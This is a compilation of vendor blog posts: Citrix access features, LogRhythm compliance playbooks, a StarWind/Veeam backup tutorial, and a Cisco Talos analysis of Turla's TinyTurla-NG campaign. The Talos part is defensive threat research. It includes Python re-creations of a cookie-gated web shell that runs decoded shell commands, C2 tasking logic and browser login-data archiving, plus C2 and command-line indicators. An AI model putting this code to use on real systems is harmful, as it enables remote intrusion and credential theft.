Thursday, February 22, 2024

Introducing more access options with Multi-Workspace URL!

How users access their resources is a crucial part of the Citrix environment. Enterprises want to make access as easy as possible while maintaining security and delivering the right resources. This is often done by separating the access layer into different URLs. Though secure, this approach takes time for administrators to implement, since they must maintain the required security and resources for each use case.

Our teams are continuously working to simplify processes. To address this need to simplify user access, we are excited to announce that the Multi-Workspace URL functionality is now available natively within Citrix Cloud! We recognize that many of our enterprise customers have mature access tiers often requiring more than a singular access URL. You can now create up to 10 URLs in your Citrix Cloud environment!

This functionality helps address three key concerns with multiple access points: branding, authentication methods, and resource filtering. Read further about how our new functionality can address these key areas.

Branding

There are often multiple groups of users accessing a Citrix environment. These users may come from a variety of business units, such as HR and IT, or even be third parties like contractors or vendors. To help users identify that they are at the correct access URL, companies often employ different branding and customizations to make each URL easily identifiable at a glance. You can customize your branding per URL, per user group, or both! Leveraging Multi-Workspace URL allows admins to configure store URLs that are easily remembered by users. This simplifies access and increases productivity.

Theme prioritization is also supported with Multi-Workspace URL. The theme applied is the highest-priority theme that matches a given user's group membership, Workspace URL, or both. Now you can ensure your Citrix UI looks great and make it easier for your users to know they’re in the right spot!
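As a rough illustration, the prioritization rule above can be sketched in Python. The field names and the lower-number-wins priority ordering are assumptions made for this example, not the actual Citrix configuration schema:

```python
def pick_theme(themes, user_groups, url):
    """Return the matching theme with the highest priority (lowest number)."""
    candidates = [
        t for t in themes
        # A theme with no "groups"/"urls" restriction matches everyone.
        if (not t.get("groups") or set(t["groups"]) & set(user_groups))
        and (not t.get("urls") or url in t["urls"])
    ]
    return min(candidates, key=lambda t: t["priority"], default=None)

themes = [
    {"name": "HR purple", "priority": 1, "groups": ["HR"]},
    {"name": "Contractor", "priority": 2, "urls": ["vendors.example.cloud.com"]},
    {"name": "Default", "priority": 9},  # unrestricted fallback theme
]
print(pick_theme(themes, ["HR"], "hr.example.cloud.com")["name"])  # HR purple
```

A user in multiple matching groups simply gets the highest-priority theme among those matches, which is the behavior the paragraph describes.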

Authentication Methods

A common reason for different access points is that user groups require different authentication methods. To support different authentication methods within your Citrix environment, we will soon be introducing a new feature to private Tech Preview called Conditional Authentication. With Conditional Authentication, customers will be able to select authentication methods based on conditionals like a user’s domain, group, or Workspace URL. If you are interested in being a part of the private Tech Preview, please fill out this form.

Adaptive Authentication can also be used with multi-URL to implement nFactor flows. These nFactor flows allow for different authentication methods depending on whatever factors you configure — including your different Workspace URLs.

With Multi-Workspace URL, you can ensure your end users get the right authentication methods for their use case. If you are migrating from an on-prem deployment, these features help your users continue to use the URL and authentication methods they are familiar with, ensuring a smooth transition and user experience.

Resource Filtering

Once a user logs on to the environment, they need access to all their vital resources to get their work done. With users potentially accessing multiple Workspace URLs, you must ensure they only see their specific resources in each store. This is where our new resource filtering functionality can help.

With this feature rollout, we are adding new smart access functionality to the Citrix UI. This allows for filtering within a delivery group based on the specific URL the user is accessing from. These access policies filter in the following ways:

  • Match any: The access policy allows access if any of the given filter criteria is matched by the incoming request.
  • Match all: The access policy allows access only if all of the given filter criteria are matched by the incoming request.
  • Exclude: The access policy excludes the rule if the filter criteria are met.
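The three filter modes above can be sketched as simple set operations. This is an illustrative Python model of the matching semantics, not the Citrix API; the tag names are made up for the example:

```python
def evaluate_policy(request_tags, criteria, mode):
    """Return True if the incoming request satisfies the policy filter.

    request_tags: set of tags derived from the incoming request
                  (e.g. which Workspace URL it arrived on).
    criteria:     set of tags the policy filters on.
    mode:         "match_any", "match_all", or "exclude".
    """
    if mode == "match_any":
        return bool(request_tags & criteria)   # at least one criterion matched
    if mode == "match_all":
        return criteria <= request_tags        # every criterion matched
    if mode == "exclude":
        return not (request_tags & criteria)   # rule skipped when criteria match
    raise ValueError(f"unknown mode: {mode}")

tags = {"url:hr.example.cloud.com", "group:HR"}
print(evaluate_policy(tags, {"url:hr.example.cloud.com"}, "match_any"))  # True
print(evaluate_policy(tags, {"group:HR", "group:IT"}, "match_all"))      # False
print(evaluate_policy(tags, {"group:Contractors"}, "exclude"))           # True
```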

Control access to your resources like never before with our new smart access policies for Workspace URLs.

Learn More

Check out our product documentation to learn more about this new feature.

Disclaimer: This publication may include references to the planned testing, release and/or availability of Cloud Software Group, Inc. products and services. The information provided in this publication is for informational purposes only, its contents are subject to change without notice, and it should not be relied on in making a purchasing decision. The information is not a commitment, promise or legal obligation to deliver any material, code, or functionality. The development, release, and timing of any features or functionality described for products remains at the sole discretion of Cloud Software Group, Inc.

from Citrix Blogs

Gemini models are coming to Performance Max

New improvements and AI-powered features are coming to Performance Max, including Gemini models for text generation.

from AI

How to Leverage Case Playbooks for Compliance 

Mature security organizations should leverage playbooks to guide their responses to potential breaches and ensure compliance with regulations. These playbooks serve as dynamic blueprints, outlining predefined steps, protocols, and best practices tailored to specific scenarios. Harnessing the power of playbooks in cybersecurity not only streamlines incident response but also empowers organizations to preemptively mitigate risks, fortify defenses, and maintain regulatory adherence.

How LogRhythm Case Playbooks Help with Compliance 

LogRhythm Case Playbooks make it easier and more repeatable for analysts to respond to incidents and security events within a security information and event management (SIEM) platform. Through the rich feature set of Case Playbooks, analysts can not only create their own playbooks, but also modify existing playbooks and attach company policies and procedures to them. All these features let the analyst react faster and more efficiently.

Because playbooks are a documented set of procedures, they also lend themselves well to activities related to compliance requirements. Maintaining proper compliance can be challenging, but implementing more compliance-focused playbooks, or reviewing your existing security-focused playbooks for compliance considerations, will benefit your company. This is especially valuable for new analysts with little compliance experience.

Cybersecurity Playbook Examples 

In this blog, the LogRhythm Labs compliance research team highlights two examples where Playbooks can help strengthen your compliance maturity and reduce gaps in your compliance. For LogRhythm customers, both Playbooks can be found in LogRhythm Community.

Playbook #1: Data Exfiltration 

In this first example, you can observe appropriate actions to consider when tackling potential data exfiltration from a compliance perspective. The goal of this playbook is to provide template guidance for new analysts mitigating a detected data breach while remaining compliant with relevant data protection laws and frameworks (in this case, GDPR). Data breaches are one of the most common security risks an organization can experience, so it’s pivotal to establish an action plan that alleviates the pressure on any single responder and encourages efficient collaboration.

SIEM data exfiltration playbook for compliance

In the context of compliance and technical analysis, here are preliminary and closing steps to consider when building out a reaction plan towards data breaches: 

  1. Stay Calm and Composed 
    • Maintain a calm demeanor and focus on the task at hand. Security breaches can be stressful, but a composed response is crucial. 
  2. Incident or Event 
    • Determine if you are investigating an incident or event. 
  3. Identify the Affected Host 
    • Identify the host involved with the signaled data exfiltration alarm. 
  4. Validate Detection 
    • Collaborate with the security operations center (SOC) department to confirm the validity of the alert, whether it is a False Positive or a True Positive. Then check if the alarm context aligns with your organization’s policies and expectations regarding data exfiltration. 
  5. Notify Management and Incident Response Team 
    • If the detection is confirmed to be a True Positive, immediately inform your supervisor or the designated incident response team within your organization about the breach. Time is critical, so swift action is required.
  6. Document the Incident 
    • Start documenting all relevant details about the breach within a breach report, including the date and time it was discovered, the method of breach, affected systems, and the potential impact. Ensure all information is accurate and well organized. 
  7. Activate the Incident Response Plan 
    • Refer to your organization’s incident response plan and follow the predefined steps for addressing security incidents. This plan should outline roles and responsibilities during a breach. 
  8.  Data Breach Notification 
    • Determine whether it constitutes a data breach as defined by GDPR and other relevant laws. If the breach meets the criteria for notification, work with legal and compliance teams to prepare and submit notifications to regulatory authorities and affected individuals within the required timeframe. 
  9. Communication 
    • Coordinate internal and external communication efforts. Ensure that affected parties are informed in a timely and appropriate manner. Maintain a record (for example emails, instant messages, etc.) of all communication related to the breach. 
  10. Legal and Regulatory Compliance 
    • Assist in the collaboration with legal counsel to ensure that all actions taken are compliant with GDPR and other data protection laws/regulations. 
  11. Continuous Improvement 
    • Continuously assess and improve data security and compliance measures based on lessons learned from the breach and changes in regulations. 

Handling data breaches from a compliance perspective requires a combination of technical knowledge, legal understanding, and strong communication skills. Collaboration with IT, legal, and internal security teams is crucial to effectively manage and mitigate the impact of a breach. Please ensure to employ this document as a template and refer to your organization’s policies/best practices when creating your playbook. 
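To make steps 6 and 8 of the playbook concrete, here is a minimal Python sketch of a breach report record with a GDPR Article 33 notification deadline (the supervisory authority must be notified within 72 hours of becoming aware of a breach). The class and field names are illustrative, not part of LogRhythm SIEM:

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta

@dataclass
class BreachReport:
    discovered_at: datetime         # step 6: when the breach was discovered
    method: str                     # step 6: method of breach
    affected_systems: list = field(default_factory=list)
    confirmed_true_positive: bool = False   # outcome of steps 4-5

    def notification_deadline(self) -> datetime:
        # GDPR Art. 33: notify the supervisory authority within 72 hours
        # of becoming aware of the breach.
        return self.discovered_at + timedelta(hours=72)

report = BreachReport(datetime(2024, 2, 20, 9, 30), "data exfiltration",
                      ["fileserver-01"], confirmed_true_positive=True)
print(report.notification_deadline())  # 2024-02-23 09:30:00
```

Tracking the deadline alongside the evidence keeps the legal notification decision (step 8) anchored to the documented discovery time rather than to memory.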

Playbook #2: “Material” Incidents 

This second example is related to the SEC’s new rules for public companies around the disclosure of “material” cyber incidents. This has been a popular and often contentious topic amongst industry professionals as the requirements of the new rule have parameters that are open to interpretation, specifically around what constitutes a material incident and the timeline for disclosure.  

Materiality, as described by the SEC in the final rule, means that “there is a substantial likelihood that a reasonable shareholder would consider it important.” Once an incident is determined to be material, an organization has four business days to disclose. By this definition, materiality is not necessarily a simple financial threshold or set of events that must occur, but a culmination of data points that in aggregate could be material to a reasonable investor. Given the nature of this independent evaluation of materiality, each organization is likely to have a decision maker, or set of decision makers, that evaluates the circumstances to determine materiality.

Because of this, our playbook template does not provide a step-by-step guide to determining if a given incident is material. This playbook is intended to help security analysts track the path of an incident across internal and external systems, capture related evidence, and communicate that information to appropriate stakeholders for ultimate evaluation of materiality. By following the guidance in this template, the appropriate stakeholders should be informed in a timely manner and have enough evidence to assess materiality and the need to make public disclosures. 

LogRhythm SIEM playbook for compliance

Figure 1: Material Incident Playbook Procedures in LogRhythm SIEM

  1. Determine if you are investigating an incident or event 
    • This step could take further investigation to complete, depending on your organization’s definition of event and incident, but it is a key delineation that should be made.
  2. Acquire, preserve, secure, and document evidence
    • When the case is created, some evidence related to the incident is likely already attached, but it is critical to gather all related data into the case for evaluation by yourself and other reviewers.
  3. Identify the hosts involved in the incident and obtain a forensic image of each system
    • The importance of preserving evidence is critical. Additionally, this is a perfect opportunity to make note of whether the systems are in scope for any compliance efforts and make initial contact with those system owners.  
  4. Identify the services impacted 
    • Document the nature of the impact on any impacted services and the timing related to that impact. This information will help decision-makers evaluate the scope and size of the incident.  
  5. Identify the method of attack
    • This step may not be readily apparent but will be important for decision makers to understand and potentially include when disclosing. 
  6. Identify the source of attack 
    • If possible, identify and document the source of the attack. Use OSINT resources as necessary to source the activity and link it to potential threat actors. Like the step prior, this step may take time, but will also be important for decision makers in evaluating the overall significance of the incident and ongoing risk. 
  7. Disable any affected user accounts 
    • Any user accounts utilized during the attack, either compromised or newly created, should be tracked and recorded within the case. This will be important both in stopping the potential spread of the incident and in tracking the overall scope of what occurred.
  8. Identify data classification of the data involved 
    • Identify what data may have been impacted in relation to this incident. Once identified, determine the impact to affected data (read, exfiltrated, modified, deleted) and determine ownership of data. This step can be difficult without a robust and mature data governance program in place, but narrowing down the impacted data involved will again help define the overall scope and potential impact of the incident.  
  9. Notify Security Leader 
    • By this point it is important to engage the appropriate security and/or compliance leader of the active incident investigation and interim status along with an expected evaluation completion. This will allow decision makers to begin evaluating initial facts and considerations for disclosure. 
  10. Identify how the incident occurred 
    • Identify how the incident occurred by evaluating method of attack, impacted resources, and evaluation of host logs. 
  11. Provide feedback and lessons learned to reduce the chances of a recurring incident
    • Identify all vulnerabilities that were a part of this incident and provide steps to harden against such vulnerabilities in the future to the system, application, and data owners. Furthermore, provide a summary to the directors of those owners. Depending on the severity of the incident, you may also want to hold a lessons learned meeting with the directors and their managers. 

Both examples are prime compliance use-case templates. When considering these playbooks, or any other template, for compliance purposes, it is important to continuously reevaluate their value, their alignment with internal procedures, and opportunities to reduce duplication.

To learn more about how LogRhythm can help you achieve compliance, visit our webpage overview.

The post How to Leverage Case Playbooks for Compliance appeared first on LogRhythm.

from LogRhythm

Setting up StarWind Virtual SAN (VSAN) as Hardened Repository for Veeam B&R


Hi, fellas. If you’re in charge of keeping your business data safe, you know that protecting it from ransomware and other threats is a top priority. One of the best ways to do this is using a 3-2-1-1 backup practice. That extra “1” in 3-2-1-1 stands for using immutable storage, such as on a Linux-based hardened repository.

In this article, I will show you how to turn your existing or aging server hardware into immutable backup storage to keep your data safe against ransomware. All you need is Veeam Backup & Replication and StarWind VSAN, which will perform the role of the Hardened Repository. This is a super easy and efficient way to keep your data safe, and I’ll walk you through the entire process step by step.

Why immutability?

Firstly, let’s talk about why backups have to be immutable. Essentially, it means that once a backup is made, it can’t be deleted or changed. This is important for crucial data because it means that even if a hacker gets into your system and tries to remove your backups, they won’t be able to. This is why write-once-read-many (WORM) storage media like tape libraries and optical media are commonly used for backups. However, these types of media can be a bit of a pain to manage because they need to be rotated and replaced regularly to align with retention policies.

What’s the easiest way to enable immutability? 

This is where Veeam B&R comes in – it’s an industry-standard backup solution that works with most storage media types, including physical and virtual tapes. What’s more, Veeam B&R v11 added support for Hardened Backup Repositories, allowing you to enable immutability for backups without using object storage or any specialized third-party solutions. You can find the deployment documentation for this in the Veeam B&R KB.

Now, you could go through the process of setting up a Linux server and configuring it to work with Veeam B&R, but it’s not exactly a walk in the park. However, there’s good news – we’ve made it super simple with StarWind VSAN.

Diagram: StarWind VSAN as Hardened Repository for Veeam B&R

We’ve developed a set of management tools that are pre-configured in the web console, so you can easily set up a storage server using commodity hardware. All you need to do is use a few wizards in the StarWind Virtual SAN web console, and you’ll have a hardened repository for Veeam B&R in no time.

How to set up?

In today’s article, I won’t be covering the initial setup process. For details on configuring the StarWind Controller Virtual Machine (CVM), its networking, and storage, refer to our previous article: “How to Create a File Share with StarWind VSAN”. Make sure to review it before proceeding. We’ll also post instructions for the bare-metal StarWind VSAN deployment in a separate blog post later on, so stay tuned.

Assuming you’ve completed the preliminary steps and created a storage pool, we can now move on to creating a new volume in the Virtual SAN Web UI.

Once the storage pool is created, navigate to the “Volumes” tab and click the “+” button to open the “Create volume” wizard:

“Volumes” tab | “Create volume”

Now select the storage pool that you are going to use for the new volume and click “Next”:

Create volume wizard | Select storage pool

Specify the name of the new volume and select the required size:

Create volume | Specify settings

Now select the filesystem for your volume. Select the “Backup repository” option, because it is already configured according to Veeam best practices and recommendations.

Create volume | Choose Filesystem settings

Review your settings and click “Create” to create the new volume:

Create volume | Review summary

After this, you need to add a Veeam user to the CVM to provide Veeam access to the storage. To do this, in the “Volumes” tab, select your newly created backup volume and click “Manage VHR (Veeam Hardened Repository) user”.

In the “Manage VHR user” pop-up window, click the “+” button:

Manage VHR user | Create Veeam user

Specify the credentials for the new user:

Create Veeam user | Specify the credentials for the new user

Select the newly created user, enable SSH access for it, and click “Save”:

Manage VHR user | Select the newly created user and enable SSH

Congrats! You have completed the StarWind VSAN configuration. You’ll need to connect the created volume to Veeam B&R as the new backup repository. To do that, open the Veeam Backup and Replication console, navigate to “Backup Infrastructure”, and select “Backup Repositories”:

Veeam Backup and Replication console | Navigate to “Backup Infrastructure”, and select “Backup Repositories”

Click “Add Repository” and select “Direct attached storage”:

Add Backup Repository | Select “Direct attached storage”

Next, select “Linux (Hardened Repository)”:

Direct Attached Storage | Select “Linux (Hardened Repository)”

In the “New Backup Repository” wizard, specify the name and description for the new repository and click “Next”:

“New Backup Repository” wizard | Specify the name and description for the new repository

In the next step, click “Add New”:

New Backup Repository wizard | Add New

In the “New Linux Server” wizard, specify the IP address or the DNS name of your StarWind CVM and click “Next”:

New Linux Server wizard | Specify the IP address or the DNS

Click “Add” and specify the credentials of the VHR user account that you created in StarWind VSAN Web UI:

New Linux Server | Specify the credentials of the VHR user account

SSH Connection | Provide Credentials

Review the installed components and click “Apply”:

New Linux Server | Review the installed components

Wait until the installation is completed and then click the “Next” button:

New Linux Server | Wait until the installation is completed

Review the summary and click “Finish”:

New Linux Server | Review the summary

In the “New Backup Repository” wizard, select the newly added Repository server from the drop-down menu:

New Backup Repository wizard | Select the newly added Repository server

Now, select the path to the volume on the StarWind VSAN appliance. Also, check that the “Use fast cloning on XFS volumes” setting is enabled and specify the required retention period for immutability:

New Backup Repository | Select the path to the volume on the StarWind VSAN appliance

After that, check the Mount Server settings, where you will be doing fast restores of your backups:

New Backup Repository | Check the Mount Server settings

Check the components that will be installed and click “Apply”:

New Backup Repository | Check the components that will be installed

Wait until the process is completed and click “Next”:

New Backup Repository | Wait until the process is completed

Review the summary and click “Finish”:

New Backup Repository | Review the summary

To secure the server from potential local threats such as credentials theft, in the StarWind VSAN Web UI, navigate to the “Volumes” page, launch the “Manage VHR user” wizard, and disable SSH for the VHR user account:

Manage VHR user wizard | Disable SSH for the VHR user account


While this method makes it easy to set up a hardened repository and secure your backups, it’s still important to regularly test and verify your backups to ensure they are working properly and can be restored in case of an emergency. Keep your software and hardware up to date, and have a disaster recovery plan in place in case the worst happens.


To sum up, using StarWind VSAN as a hardened repository for Veeam B&R is a great way to protect your business data from threats, while also making the setup process easy and straightforward. With the help of our management tools, you can have a secure and reliable backup solution up and running in no time. So, if you’re looking to upgrade your backup strategy and keep your data safe, give StarWind VSAN a try.

This material has been prepared in collaboration with Asah Syxtus Mbuo, Technical Writer at StarWind.

from StarWind Blog

TinyTurla-NG in-depth tooling and command and control analysis

  • Cisco Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT. New findings from Talos illustrate the inner workings of the command and control (C2) scripts deployed on the compromised WordPress servers utilized in the compromise we previously disclosed.
  • Talos also illustrates the post-compromise activity carried out by the operators of the TinyTurla-NG (TTNG) backdoor to issue commands to the infected endpoints. We found three distinct sets of PowerShell commands issued to TTNG to enumerate, stage and exfiltrate files that the attackers found to be of interest.
  • Talos has also discovered the use of another three malicious modules deployed via the initial implant, TinyTurla-NG, to maintain access, and carry out arbitrary command execution and credential harvesting.
  • One of these components is a modified agent/client from Chisel, an open-sourced attack framework, used to communicate with a separate C2 server to execute arbitrary commands on the infected systems.
  • Certificate analysis of the Chisel client used in this campaign indicates that another modified Chisel implant has likely been created that uses a similar yet distinct certificate. This assessment is in line with Turla’s usage of multiple variants of malware families, including TinyTurla-NG, TurlaPower-NG and other PowerShell-based scripts, during this campaign.

Talos, in cooperation with CERT.NGO, has discovered new malicious components used by the Turla APT in the compromise we’ve previously disclosed. The continued investigation also revealed details of the inner workings of the C2 scripts including handling of incoming requests and a WebShell component that allows the operators to administer the compromised C2 servers remotely.


C2 server analysis

The command and control (C2) code is a PHP-based script that serves two purposes: It’s a handler for the TinyTurla-NG implants and web shell that the Turla operators can use to execute commands on the compromised C2 server. The C2 scripts obtained by Talos are complementary to the TinyTurla-NG (TTNG) and TurlaPower-NG implants and are meant to deliver executables and administrative commands to execute on infected systems.

On load, the PHP-based C2 script will perform multiple actions to create the file structure used to serve the TTNG backdoor. After receiving a request, the C2 script first checks if the logging directory exists, if not, it will create one. Next, the script checks for a specific COOKIE ID. If it exists and corresponds to the hardcoded value, then the C2 script will act as a web shell.

It will base64 decode the value of the $_COOKIE (not to be confused with the authentication COOKIE ID) entry and execute it on the C2 server as a command. These commands are either run using the exec(), passthru(), system(), or shell_exec() functions. It will also check if the variable specified is a resource and read its contents. Once the actions are complete, the output or resource is sent to the requestor and the PHP script will stop executing.
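For illustration, the web-shell branch described above can be re-created in Python (the actual handler is a PHP script that shells out via exec(), passthru(), system(), or shell_exec()). The cookie names and token below are hypothetical stand-ins for the hardcoded values in the real script:

```python
import base64
import subprocess

AUTH_COOKIE = "auth"         # hypothetical name of the hardcoded COOKIE ID
AUTH_VALUE = "s3cr3t-token"  # hypothetical hardcoded authentication value

def handle_request(cookies):
    """Act as a web shell only when the authentication cookie matches."""
    if cookies.get(AUTH_COOKIE) != AUTH_VALUE:
        return None                       # not an operator request
    # The command arrives base64-encoded in a second cookie entry.
    cmd = base64.b64decode(cookies["cmd"]).decode()
    # Execute on the "C2 server" and hand the output back to the requestor.
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

out = handle_request({AUTH_COOKIE: AUTH_VALUE,
                      "cmd": base64.b64encode(b"echo pwned").decode()})
print(out.strip())  # pwned
```

The key point the analysis makes is visible here: a single hardcoded cookie value gates full remote command execution on the compromised server.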


C2 script’s web shell capability.

If there is an “id” provided in the HTTP request to the C2 server, the script will treat this as communication with an implant, such as TTNG or TurlaPower-NG. The “id” parameter is the same variable that is passed by the TTNG and TurlaPower-NG implants during communication with the C2 and creates the logging directory on the C2 server, as well. Depending on the next form value accompanying the “id”, the C2 will perform the following actions:

  • "task": Write the content sent by the requestor to the “<id>/tasks.txt” file and record the requestor’s IP address and timestamp in the “<id>/_log.txt”. The contents of this file are then sent to the requestor in response to the “gettask” request. This mechanism is used by the attackers to add more tasks to the list of tasks/commands that each C2 must send to their backdoor installations to execute on the infected endpoints.
  • "gettask": Send the contents of the “<id>/tasks.txt” file to the infected system requesting a new command to execute on the infected endpoint.
  • "result": Get the content of the HTTP(S) form and record it into the “<id>/result.txt” file. The C2 uses this mechanism to obtain and record the output of a command executed on an infected endpoint by the TTNG backdoor into a file on disk.
  • "getresult": Get the contents of the “<id>/result.txt” file from the C2 server. The adversaries use this to obtain the results of a command executed on the infected endpoint without having to access the C2 server.
  • "file" + "name": Save the contents of the file sent to the C2 server either in full or part to a file specified on the C2 server with the same “name” specified in the HTTP form.
  • "cat_file": Read the contents of a file specified by the requestor on the C2 server and respond with the contents.
  • "rm_file": Remove/delete a file specified by the requestor from the C2 server.

The C2 script’s request handling logic.
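The file-based tasking mechanism can be sketched as follows. This is a Python re-implementation of the described behavior for clarity, not the actual PHP C2 code, and it covers only the task/gettask/result/getresult actions:

```python
import os
import tempfile

def handle(root, implant_id, form):
    """Dispatch one request the way the C2 script is described to."""
    base = os.path.join(root, implant_id)
    os.makedirs(base, exist_ok=True)          # per-implant logging directory
    tasks = os.path.join(base, "tasks.txt")
    result = os.path.join(base, "result.txt")
    if "task" in form:                        # operator queues a new command
        with open(tasks, "a") as f:
            f.write(form["task"] + "\n")
    elif "gettask" in form:                   # implant polls for pending commands
        return open(tasks).read() if os.path.exists(tasks) else ""
    elif "result" in form:                    # implant uploads command output
        with open(result, "a") as f:
            f.write(form["result"] + "\n")
    elif "getresult" in form:                 # operator collects the output
        return open(result).read() if os.path.exists(result) else ""

root = tempfile.mkdtemp()                     # stand-in for the web root
handle(root, "abc123", {"task": "whoami"})
print(handle(root, "abc123", {"gettask": "1"}).strip())  # whoami
```

Note how the same endpoint serves both sides: the operator and the implant never talk directly, only through the files staged under the “id” directory.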

The HTTP form values accepted by the C2 server (“task”, “cat_file”, “rm_file”, “getresult”) and their corresponding operations indicate that these are part of an operational apparatus that allows the threat actors to feed the C2 server new commands and retrieve the valuable information it collects from a remote location, without having to log into the C2 itself. Operationally, this tactic benefits the threat actors because all C2 servers discovered so far are websites compromised by the threat actor rather than attacker-owned infrastructure. It is therefore advantageous for Turla’s operators to simply communicate over HTTPS, masquerading as legitimate traffic, instead of re-exploiting or accessing the servers through other means such as SSH, which would increase their fingerprint on the compromised C2 servers.

This tactic can be visualized as:

TinyTurla-NG in-depth tooling and command and control analysis

Instrumenting TinyTurla-NG to carry out post-compromise activity

The adversaries use TinyTurla-NG to perform additional reconnaissance to enumerate files of interest on the infected endpoints and then exfiltrate these files. They issued three distinct sets of modular PowerShell commands to TTNG:

  • Reconnaissance commands: Used to enumerate files in a directory specified by the operator. The directory listing is returned to the operator to select interesting files that can be exfiltrated.

PowerShell script/Command enumerates files in four locations specified by the C2 and sends the results back to it.

  • Copy file commands: Base64-encoded commands/scripts issued to the infected systems to copy over files of interest from their original location to a temporary directory, usually: C:\windows\temp\

PowerShell script copies files to an intermediate location.

  • Exfiltration commands/scripts aka TurlaPower-NG: These scripts were used to finally exfiltrate the selected files to the C2 servers.

The scripts used during enumeration, copying and exfiltration tasks contain hardcoded paths for files and folders of interest to Turla. These locations consisted of files and documents that were used and maintained by Polish NGOs to conduct their day-to-day operations. The actors also used these scripts to exfiltrate Firefox profile data, reinforcing our assessment that Turla made attempts to harvest credentials, along with data exfiltration.

While TinyTurla-NG itself is enough to perform a variety of unauthorized actions on the infected system using the combination of scripts described above, the attackers chose to deploy three more tools to aid their malicious operations:

  • Chisel: Modified copy of the Chisel client/agent.
  • Credential harvesting scripts: PowerShell-based scripts for harvesting Google Chrome or Microsoft Edge’s saved login data.
  • Tool for executing commands with elevated privileges: A binary that is meant to impersonate privilege levels of a specified process while executing arbitrary commands specified by the parent process.

The overall infection activity once TTNG has been deployed looks like this:

[Figure: overall infection activity after TTNG deployment]

Using Chisel as another means of persistent access

Talos’ investigation uncovered that apart from TurlaPower-NG, the PowerShell-based file exfiltrator, the adversary also deployed another implant on infected systems. It’s a modified copy of the Go-based, open-source tunneling tool Chisel, stored at the location: C:\Windows\System32\TrustedWorker[.]exe

The modified Chisel malware is UPX-compressed, as is common for Go binaries, and has the C2 URL, port, communication certificate and private key embedded in the sample. Once it decrypts these artifacts, it creates a reverse SOCKS proxy connection to the C2 using the configuration: R:5000:socks

In the proxy:

  • “R”: Stands for remote port forwarding.
  • “5000”: This is the port on the attacker machine that receives the connection from the infected system.
  • “socks”: Specifies the usage of the SOCKS protocol. 

(The default local host and port for a socks remote in Chisel is 127[.]0[.]0[.]1:1080)
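A small sketch of how such a remote spec breaks down, following the field meanings listed above (simplified; Chisel's real parser handles more forms than this):

```python
# Sketch of how a Chisel remote spec such as "R:5000:socks" decomposes,
# per the fields described above. Simplified for illustration; not
# Chisel's actual parser.

def parse_remote(spec: str) -> dict:
    parts = spec.split(":")
    reverse = parts[0] == "R"    # "R" marks remote (reverse) forwarding
    if reverse:
        parts = parts[1:]
    remote_port = int(parts[0])  # port opened on the attacker's server
    if parts[1] == "socks":
        # A socks remote tunnels into Chisel's built-in SOCKS proxy,
        # which defaults to 127.0.0.1:1080 on the client side.
        local_host, local_port = "127.0.0.1", 1080
    else:
        local_host, local_port = parts[1], int(parts[2])
    return {"reverse": reverse, "remote_port": remote_port,
            "local_host": local_host, "local_port": local_port}
```

For "R:5000:socks" this yields a reverse tunnel on attacker port 5000 terminating at the default SOCKS endpoint 127.0.0.1:1080.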

The C2 server that the Chisel sample contacts is: 91[.]193[.]18[.]120:443.

The TLS configuration consists of a client TLS certificate and key pair. The certificate is valid from Dec. 7, 2023 to Dec. 16, 2024. This validity period is consistent with Talos’ assessment that the campaign began in December 2023. The issuer of the certificate is named “dropher[.]com” and the subject name is “blum[.]com”.

TLS certificate for the Chisel malware used by Turla.

During our data analysis, we found another certificate that we assess with high confidence was also generated by Turla’s operators, but it’s unclear whether this was a mistake or whether they intended the certificate for use with another modified Chisel implant.


Certificate issuer DN.

The new certificate has the same issuer; in this case, the common name is blum[.]com and the serial number is 0x1000. This certificate was generated one second before the one used in the modified Chisel client/agent.

Additional tools for elevated process execution and credential harvesting

Turla also deployed two more tools to aid their malicious operations on the infected systems. One is used to run arbitrary commands on the system and the other is used to steal Microsoft Edge browser’s login data.

The first tool is a small, simple Windows executable that creates a new command-line process on the system by impersonating the privilege level of another existing process. The tool accepts a target process identifier (PID), representing the process whose privilege level is to be impersonated, and the command line to be executed. A new cmd[.]exe is then spawned and used to execute arbitrary commands on the infected endpoint. The binary was compiled in early 2022 and was likely used in previous campaigns by Turla.


The tool contains the embedded cmd[.]exe command line.

The second tool discovered by Talos is a PowerShell script residing at the location:


This script is used to find login data from Microsoft Edge located at:

%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

This data file and the corresponding decryption key extracted from the endpoint are archived into a ZIP file stored in the directory: C:\windows\temp\<filename>.zip
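The archiving step can be sketched as below. The function and archive names are hypothetical; as background, Chromium-based browsers keep the AES key that protects saved logins in the profile's "Local State" file, wrapped with DPAPI, which is why the key must be collected alongside the database.

```python
import zipfile
from pathlib import Path

# Sketch of the archiving step: the Edge "Login Data" SQLite file plus the
# decryption key pulled from the profile are zipped for exfiltration.
# The output file name is hypothetical; the observed path pattern is
# C:\windows\temp\<filename>.zip.

def archive_login_data(login_data: Path, key_file: Path, out_dir: Path) -> Path:
    out = out_dir / "collected.zip"  # hypothetical archive name
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.write(login_data, login_data.name)  # the "Login Data" SQLite DB
        zf.write(key_file, key_file.name)      # key needed to decrypt entries
    return out
```

Bundling both artifacts into one archive means a single upload gives the attackers everything needed to decrypt the saved credentials offline.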

The script can be used to obtain credentials for Google Chrome as well, but has been modified to parse login data from:


PowerShell script obtaining key and login data to add to the archive for exfiltration.

TTNG uses the privilege elevation tool to run the PowerShell script using the command:

"C:\Windows\System32\i.exe" _PID_ "powershell -f C:\Windows\System32\edgeparser.ps1"

This results in the tool spawning a new process with the command line:

C:\Windows\System32\cmd.exe /c "powershell -f C:\Windows\System32\edgeparser.ps1"


Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

